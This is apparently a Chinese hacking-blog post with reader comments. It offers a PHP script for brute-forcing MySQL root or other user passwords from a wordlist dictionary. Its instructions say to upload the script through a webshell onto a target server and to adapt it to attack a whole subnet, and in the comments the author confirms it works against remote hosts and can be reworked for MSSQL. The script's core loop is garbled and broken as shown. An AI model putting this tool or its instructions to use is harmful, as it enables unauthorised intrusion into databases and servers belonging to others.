set_time_limit(0); //脚本不超时
$ip = "localhost"; //IP
$user = "root"; //用户名
$passwd = file("password.txt"); //密码字典
for($i=0; $i得到密码:".$pass."!!!";
exit();
}
else {
echo $pass.'
';
}
}
?>
代码简单的不能再简单了,就不解释了,功能很简单,传到WebShell上去暴力破解本机的MySql数据库Root或其它用户的密码,因为是破解本机,所以速度奇快无比,有点效果,这个以前有人发过,这个是我改过的。
爆破速度奇快无比,暴力2W密码只需要十几秒,密码破解准确率达100%,稍微改一下就可以暴力整个C段的,你懂的……
用法:
1、修改 PHP 代码中的用户名与IP
2、准备字典 password.txt,每行一个,理论上支持无数行。
3、将脚本和字典一起传到目标Web服务器上,访问该脚本,即开始暴力破解,破解结果实时输出,盯着就行了。
留言评论(旧系统):
【匿名者】 @ 2012-04-05 21:15:35
问下核老大,这个能不能爆破远程的主机,ip那个地方我填写外部的ip?
本站回复:
是的,完全支持。靠,这个压根不用问啊,晕……
佚名 @ 2012-11-19 19:49:48
php5.3.18没法执行啊
本站回复:
请贴出具体报错内容……
佚名 @ 2014-01-29 01:05:40
核老板 来份字典如何
本站回复:
你妹,百度一下一大堆……
by阿明 @ 2014-01-29 04:22:40
核总,太给力了,强烈你再写个爆破sa的脚本
本站回复:
尼玛,改下数据库链接方式能死啊……
酒逍遥 @ 2014-01-29 17:27:23
简单,高效
不过个人觉得关键点在 密码字典上.
本站回复:
字典 +1
4bc @ 2014-02-01 14:49:43
核总,个人觉得可以加上ini_set("memory_limit","-1");或直接动.htaccess文件。如何哇
本站回复:
Good JB!这个可以有!
佚名 @ 2014-05-31 18:48:12
经测试只能爆破本机。本机以为,完全没法用,或许我不会用求指教
本站回复:
用来暴破服务器本机或C段机器。
小城 @ 2014-06-01 18:28:40
$ip = "localhost";换成$ip = = file("ip.txt"); 爆破mssql。如果php没开启mssql odbc扩展是不行的。。。。。
本站回复:
是滴~
sabre @ 2015-01-27 21:42:18
不能爆破远程ip 。。。当我填入 192.168.1.149 还是爆破自己的本机3306 。。。。
本站回复:
$ip = "192.168.1.149"; //IP
sabre @ 2015-01-27 21:48:12
我填入ip为 192.168.1.149 结果破解的还是本机的ip 如何破?
本站回复:
$ip = "192.168.1.149"; //IP
佚名 @ 2015-06-18 14:14:15
再有个帐号密码 生成脚本就好了
本站回复:
+1
小手一抖 @ 2015-06-20 21:08:29
写个c语言的命令行参数爆破sql好么,同时输出结果
本站回复:
-_-!!!
文章来源于lcx.cc:PHP Mysql 密码暴力破解,本机暴力破解 3306 端口,源码
评论